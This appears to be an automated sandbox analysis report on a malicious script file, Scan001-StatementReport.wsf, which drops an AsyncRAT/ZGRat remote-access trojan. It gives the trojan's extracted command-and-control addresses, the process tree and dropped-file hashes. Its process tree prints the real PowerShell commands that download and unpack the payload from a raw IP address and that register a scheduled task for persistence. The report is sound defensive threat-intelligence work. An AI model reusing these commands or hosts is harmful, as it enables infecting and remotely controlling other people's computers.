Analysis
-
max time kernel
148s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
16-02-2024 21:24
General
-
Target
Scan001-StatementReport.wsf
-
Size
31KB
-
MD5
99ec5f8d2779e65e64c54265f8ee1547
-
SHA1
593116987bdd5119eceec7882c8fbd11fae139f2
-
SHA256
62edf192312ffa77440aaac0de4b693126e2c14e6a96c9764de45fc4ff6c2ef1
-
SHA512
e39896113ea391097335b2c93d9d6dd76b255281c0aebc948c8a47ecd83fd7e1997ac224a30f108153b17d37f4fdd75dbce2a8d6ed9f5034af34293083cc4cbe
-
SSDEEP
768:Fs0IeoVcogHzATv4MR1b6rONCps0IeoVcogHzATv4MR1b6rONCD:pMXKceMXKcs
Malware Config
Extracted
http://176.107.183.105:555/w.jpg
Extracted
asyncrat
AWS | 3Losh
danny
r0nj.ooguy.com:7777
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Detect ZGRat V1 2 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 56 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Scan001-StatementReport.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://176.107.183.105:555/w.jpg' -Destination 'C:\Users\Public\ty.zip';Expand-Archive -Path 'C:\Users\Public\ty.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Nb.bat" "2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\run.bat" C:\Users\Public\"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\run.ps1"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exeWScript /B "C:\Users\Public\app.js"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\run.bat" C:\Users\Public\"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\run.ps1"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"8⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp604B.tmp.bat""9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 310⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\Users\Public\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\app.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\run.bat" C:\Users\Public\"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\run.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5e5ab5d093e49058a43f45f317b401e68
SHA1120da069a87aa9507d2b66c07e368753d3061c2d
SHA2564ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74
SHA512d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.logFilesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5decfb665a7e351be69208f01708dd0bb
SHA15bac2080f21ad46da818a4f7079149d4fcd0b98e
SHA256356ae0f665284e3aba85311ec0dff98b68295e8fb9d2b722b8f3e0d2bc788b12
SHA5128d463cf1a4c2693d221c1cec4585e39c8c81cd42126a859b41684ccd6b1749c602392abbc74d00ab17058bc984eb11ea6370fd7f8a0baecc28b9855a923da1b1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b9b69ecd72a4d3eb0ea206744e460362
SHA1fc7347224a0489678602f5645272ca64b4dceb1c
SHA256504658eaf23f6234160d175b7333f98dde0adf7eebe6ce6339c91365be6bb0e7
SHA512eea6b875e9153c002110cef8c1fb140b54d1e9fa759217a4b2fdb78373fa12f1df420f7c615fe25fa3e4643054ab67e4cc4086331f862d508e56108ceae57ace
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
2KB
MD55949b7fbd8b1f7b1f8d190d3b286b66d
SHA1c80d105a11fe4be6e66b352b8c1a616dfe998e13
SHA2569f2d7b90cda62789cc509e1dc3ff43b1f895c09b4664b30344e75b42a64d1021
SHA5125f64bbb63376916e4a939636c00625595145ee2b44cc9470ab3e94e689e759cda16bfe52683d5956e587f2bda424a41698030a10e315d99f6e674df8e791e01f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v0z52f0m.o2h.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmp604B.tmp.batFilesize
179B
MD5e3068da5cc98cf7b05b8ce66f56a7899
SHA1c055a913a1d14faa915641417ac1994412dc8541
SHA256aa7bff6b48dc56c9716020e62d419092a3e5682e4d10fae6fb3b2ed985665e7f
SHA51239589cdffdbb2f553d4bd9dbb9d8ab6ebb3a3d8e2a956c508d27229aedac6f40aa7b2932ec2428c79e8e9d15499839407732022d1df289976d961f74ae4efccd
-
C:\Users\Public\Execute.txtFilesize
9B
MD5c1877b9f865e274a965e39183b43033e
SHA160e4f44ccb38950a5442cd31e70195ea781a81a4
SHA256f1e6cecec8b3f209b1b1d27605443614a18985c2fc00be9d0a1b6910eb4a71d4
SHA5121085f3e2ef62183048effa93d9093075e3a67b2b1236024b7afad7055f5c81462ac5810441e890fdc8c313d0937f00fc213402a32c637ee5362bc8a8900b9da3
-
C:\Users\Public\Framework.txtFilesize
522B
MD55b8aeda9f1c7fd54274769c0be1c5530
SHA15b61323f6ea44f2f3f8b393e5bfd32e41860f511
SHA2565213e37981f9a8700f749aecb3fe62a2441ae38b96e4a04e809d51924371ec35
SHA5129f1a323273b064910f2febb7345b12843d17ba2b918de12d25535f00c94b40705b87042021a69b8e8e8ff82b336c0529116a93069af53f593df10becdcd4ef69
-
C:\Users\Public\Gettype.txtFilesize
9B
MD5c34a6bf09e7f7444048f907d78503140
SHA12bbe95da04878a156d2bdeda387b4082f288461c
SHA25608fb9026b4c0dd64cf4e848e8dda726d8cd4aa8dac8c9e6216aa271c1b8eb342
SHA512936be892183313d2672caf1b1cc6dda27200adc83744c0203c767ed7f7c3758824738322d448f1b8f56cba37168a1424532b74b1a6c650b0c7bce6524c9e207c
-
C:\Users\Public\Invoke.txtFilesize
8B
MD5a8a83092504aa294279bdbdb91c2280b
SHA144fe829e889e425d3e6331e59ed125db05f60114
SHA256e37276070a49392777dd5f41102b47528a0e6fbf122b898d8eda2f0eff5c488c
SHA512187c89189980e96f05649a0d2897fa06bca0997c4961ce80c1522ea324ff1798ade34cd032abdd5806bcf9e082f6dd729ba8cb60371e82595083b0547bb1c5db
-
C:\Users\Public\Nb.batFilesize
3KB
MD5139bd7cc2c46df45cc1271a82d009bf7
SHA1f722b419801b8f9fbd220d92c57691bc925ff307
SHA25633d3e0ec7bfb73d25231cb7aefa5d9ff7590b7e5c17debca80bb6ef0e9228c5b
SHA5124f092803a21cec2b7a4869101a452e94f79cd03be29db48309f9be30642fff8032cb692cd6841d5e9ecca7a61d431c9e750698cebcb99edbf4e827e779117f25
-
C:\Users\Public\NewPE2.txtFilesize
11B
MD5d7d88fadc06a17853929346eccdc02fe
SHA1823c64b6228f44d83ea5be619acef0794d62be68
SHA2562c7a8db7972321f75201aec580d66bd55656427f8cb8af28cef152c1c25426a7
SHA5124b68e0d9a175e6cdfd301b090f406a27e404800969431fa2996605a0f45d1b6c310e4daf58da7727bf3132a5bb2c072073e9508492dc46a9d94ac19bd0e1763a
-
C:\Users\Public\ali1.txtFilesize
48B
MD56b6ded7485143a83f43a6415e48ca915
SHA1ce34e60496304c6fa43bdaeb7de09a1bb5b5791a
SHA2563f844a89c5b4f3e416bea70094f1697709a2fa296db9be85eeacd1b0d0220aa4
SHA5121174b7af68c1ed1816e702e2e4514343577268f96a0a2db759f734570bef2776cf6cc6003ed2dd6c9dc88c12a9ef940b0e043f72a90df66ee32e581a1f24a6ed
-
C:\Users\Public\ali3.txtFilesize
98B
MD53de8a9faac251fbc7d405ddafecf1e56
SHA1b471c81c16a5fb574e9dfa220e6841f3ef43d1e0
SHA256f89e423da2d550b7bd145f64ece134019c6125bd8a4ca6e7a2c7021f5a77bbf2
SHA512ad669c47832227095d49eb67ebaf13afefc76d77484a6fb594c47f731a750d6fbabc76598b3a5e46aafbef04df458cc89c4ff205cb60e4cdb4e5a7a9996c7d08
-
C:\Users\Public\ali4.txtFilesize
35B
MD5ee5fdd013bfb29adebddd3e5165a2014
SHA1eb9ac04232bf40d1f9a1e91a0cd89bc83e87f979
SHA256f99af33f73309301d2779d10106e274b99ac9bb98403c2969c6f25134162baf1
SHA512e041ea8513b2636aeaceecafa2d0e7e6c83e41651a79bb4f49005841ef2494fca402df2486d47329e1e53013adda7fa2c3a57090df7db763b43b9dfa2ec149a1
-
C:\Users\Public\app.jsFilesize
180B
MD5cdb432f329b4a16d681fc257481c0164
SHA1a33fc7f5f38ad350dfebf210c9db83daa163f10f
SHA256c55cf39792cbfce98d8f8ab2da785745742a383d2e56c01df60bad537ddc7fda
SHA512161f4bde0fef4dfe7bf37aa96d0d1535084925e01a3799726dbb4fd5204b7bd622e162623f6437f31d6536090dfde2f325f4d90942224124bc6c33fc806c5898
-
C:\Users\Public\basta.jsFilesize
181B
MD57f07022ed3034e6892f4df26514103f7
SHA1616c55238c77be766cc9ce172e16f7cf2d0590f2
SHA256f6b69ba39a0211a526396358e289e89a0255c0cb213570a39cdb12d97fe49f98
SHA51294a4aab4bd80623552433e2257fee20982eff42b310a10670e30f62c6aa44dac7bb4dda8bbeab70821d46d5e952485c95b89e36efb5903e52190dbc8511bf460
-
C:\Users\Public\byet.txtFilesize
136KB
MD575d20f797e393ffac1d5aef9013cbfd6
SHA1d3f091798b4ae104cfdfc3449088d8d654b6dafb
SHA2563f23e028d79b7258a0f660827ff4107a447cbfce9478b19ef5c856ef8d970921
SHA512838f3939f6828637a0839159b79af097fe8e20604da4936f96eb4c127a47a76692ca78fb2543c7409e4519a4657a29febe9a862fcf3a34d3e2e06aed62626823
-
C:\Users\Public\getMethod.txtFilesize
11B
MD57eb2561c37ed8d10de3ab8fe0b46b581
SHA10a90e7861b4e0bb8b9f3166a04bca3dd2d1038c4
SHA256c0565bdf0b7522c48fa7fb2f8f0cadef11191228fe26f11921c9baebca6842aa
SHA512304ed7a759c7c4f3746e78684a8f0681032794c1d49440f0a16f012f8f8fb6b92dcc51e421d53241a33b909cf03139d210aa8377432e5d4ef4445e77216b402b
-
C:\Users\Public\load.txtFilesize
6B
MD5d50aa5a0aa6fb79dc44f50361b6ee966
SHA1d604b84d1ab9daa283a5c1515a4ce9b61030c4e3
SHA2560fe9e9f192e9241f9dae392b5ffd38489f4b8d1a6f3f351ccfb167a59e4027c7
SHA512d308aa18c5a5e4e13f273674e407ab9be8c5a84e165809cf4af8255349ee2bfd3a0e5bb3a0e850dd285e654c9dfc9e6940f210ce341aebd9d2c9443055ab698a
-
C:\Users\Public\node.batFilesize
916B
MD5001718dcd21bfdf37e56766672181419
SHA1cd68bcbc04e5c72e760919a45574e68a2c052883
SHA256d46acd0cc6ccacf86752659405b8714021de1c12c7dc6c1d8e9ba1dd7bc93675
SHA51242eafba75990607f467dc95f8fcad8143dbb15ebf66a97eb8b21ef377c1bb785e47a2132d5a0e8b23097fea7e49caa49e827ba21ba5ef90df877088426ad7997
-
C:\Users\Public\run.batFilesize
73B
MD50d276af7b9ca226f782a7bbc74f738ec
SHA105726e1a25ec79c5082e8ab4e0f7862270beaa8c
SHA2567d02ee3b778807e105f619e426e581d99ce41a15e61f75217141b041e3fcbfed
SHA5125ddf89e48ee2dd2fdc52b5bd69b3d6dc31fa1b67191d3b4c8bd74f71c4d0426d6264c0640c601dc85f859d25a3034fe4d22157ece7d7503ab8fdc1fcfeb9d832
-
C:\Users\Public\run.ps1Filesize
1KB
MD57d2d201c5aeb28d3a64360e38be70355
SHA1486901dae459c30fe427f68e318b292a402cc18e
SHA2560029be421ce54a523a3b9f04f0e682e2766b152c1ca32a1bdde9c4bfe7ad0d18
SHA512cec297c8ba04ae3cae4bc29ebfe95032c67459e4c17792e8ed83d9003323111507bba22b5997b1a6cb5d111c30db4bfc55af509a9d42d3f10672370081b34182
-
C:\Users\Public\runpe.txtFilesize
361KB
MD5a59b4f87049e2563fa3fa005a1a0fbcb
SHA1821dc5c78d9e43e93f318be6ffc5a29ed566ec9b
SHA25656bebae91a672d9d118c081e1825c029dc53a6124066246c30a8921e3848ec70
SHA51213999699d8628a21c618c4d4f5b781395a99af8ab7dfada1d6c330a3ffe70d5b26c4fb9a74e10ae1f1c8c79ffa989b115429fc50b32cc25917fa71b4b4775d64
-
memory/1140-110-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/1140-118-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/1140-120-0x0000000002C20000-0x0000000002C30000-memory.dmpFilesize
64KB
-
memory/1140-123-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/1268-83-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/1268-117-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/1284-153-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/1372-106-0x00000152E4670000-0x00000152E46E6000-memory.dmpFilesize
472KB
-
memory/1372-58-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/1372-59-0x00000152CBA10000-0x00000152CBA20000-memory.dmpFilesize
64KB
-
memory/1372-60-0x00000152CBA10000-0x00000152CBA20000-memory.dmpFilesize
64KB
-
memory/1372-116-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/1372-109-0x00000152E45F0000-0x00000152E462A000-memory.dmpFilesize
232KB
-
memory/1600-139-0x0000021C2E670000-0x0000021C2E680000-memory.dmpFilesize
64KB
-
memory/1600-138-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/1600-150-0x0000021C2E670000-0x0000021C2E680000-memory.dmpFilesize
64KB
-
memory/1600-154-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/1760-130-0x0000000006A10000-0x0000000006A86000-memory.dmpFilesize
472KB
-
memory/1760-127-0x00000000060E0000-0x0000000006684000-memory.dmpFilesize
5.6MB
-
memory/1760-129-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/1760-128-0x0000000005B30000-0x0000000005B96000-memory.dmpFilesize
408KB
-
memory/1760-131-0x0000000006990000-0x00000000069EE000-memory.dmpFilesize
376KB
-
memory/1760-119-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/1760-136-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/1760-121-0x0000000002AE0000-0x0000000002AF0000-memory.dmpFilesize
64KB
-
memory/1760-132-0x0000000006AB0000-0x0000000006ACE000-memory.dmpFilesize
120KB
-
memory/1760-126-0x0000000005A90000-0x0000000005B2C000-memory.dmpFilesize
624KB
-
memory/3436-71-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/3436-96-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/3436-84-0x0000021A3F2F0000-0x0000021A3F300000-memory.dmpFilesize
64KB
-
memory/3436-72-0x0000021A3F2F0000-0x0000021A3F300000-memory.dmpFilesize
64KB
-
memory/4272-18-0x000001F236500000-0x000001F236514000-memory.dmpFilesize
80KB
-
memory/4272-19-0x000001F236540000-0x000001F236552000-memory.dmpFilesize
72KB
-
memory/4272-13-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/4272-15-0x000001F235D40000-0x000001F235D50000-memory.dmpFilesize
64KB
-
memory/4272-12-0x000001F235FC0000-0x000001F235FE2000-memory.dmpFilesize
136KB
-
memory/4272-20-0x000001F236520000-0x000001F23652A000-memory.dmpFilesize
40KB
-
memory/4272-31-0x00007FFEBD7C0000-0x00007FFEBE281000-memory.dmpFilesize
10.8MB
-
memory/4272-17-0x000001F2364B0000-0x000001F2364D6000-memory.dmpFilesize
152KB
-
memory/4272-16-0x000001F235D40000-0x000001F235D50000-memory.dmpFilesize
64KB
-
memory/4272-14-0x000001F235D40000-0x000001F235D50000-memory.dmpFilesize
64KB